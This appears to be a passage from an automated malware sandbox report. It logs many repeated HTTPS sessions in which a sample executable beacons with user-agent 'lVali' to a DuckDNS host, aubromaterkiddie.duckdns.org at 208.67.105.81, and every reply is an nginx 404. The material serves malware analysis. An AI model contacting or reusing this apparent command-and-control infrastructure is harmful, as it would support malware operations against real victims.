                2022-08-05 10:12:28 UTC75INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                18192.168.2.649782208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:50 UTC7OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:50 UTC7INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:50 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:50 UTC7INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                180192.168.2.649978208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:28 UTC76OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:28 UTC76INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:28 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:28 UTC76INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                181192.168.2.649979208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:28 UTC76OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:29 UTC76INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:28 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:29 UTC76INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                182192.168.2.649980208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:29 UTC76OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:29 UTC77INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:29 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:29 UTC77INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                183192.168.2.649981208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:29 UTC77OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:29 UTC77INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:29 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:29 UTC77INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                184192.168.2.649982208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:29 UTC77OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:29 UTC77INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:29 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:29 UTC78INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                185192.168.2.649983208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:29 UTC78OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:29 UTC78INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:29 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:29 UTC78INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                186192.168.2.649984208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:30 UTC78OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:30 UTC78INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:30 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:30 UTC78INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                19192.168.2.649783208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:50 UTC8OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:50 UTC8INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:50 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:50 UTC8INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.649741208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:29 UTC0OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:29 UTC0INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:29 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:29 UTC1INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                20192.168.2.649785208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:52 UTC8OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:52 UTC8INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:52 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:52 UTC8INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                21192.168.2.649786208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:52 UTC8OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:52 UTC9INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:52 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:52 UTC9INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                22192.168.2.649787208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:53 UTC9OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:53 UTC9INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:53 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:53 UTC9INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                23192.168.2.649788208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:54 UTC9OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:54 UTC9INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:54 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:54 UTC10INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                24192.168.2.649789208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:55 UTC10OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:55 UTC10INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:55 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:55 UTC10INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                25192.168.2.649790208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:56 UTC10OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:56 UTC10INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:56 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:56 UTC10INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                26192.168.2.649791208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:56 UTC10OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:56 UTC11INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:56 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:56 UTC11INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                27192.168.2.649792208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:57 UTC11OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:57 UTC11INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:57 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:57 UTC11INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                28192.168.2.649793208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:57 UTC11OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:57 UTC11INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:57 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:57 UTC12INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                29192.168.2.649794208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:58 UTC12OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
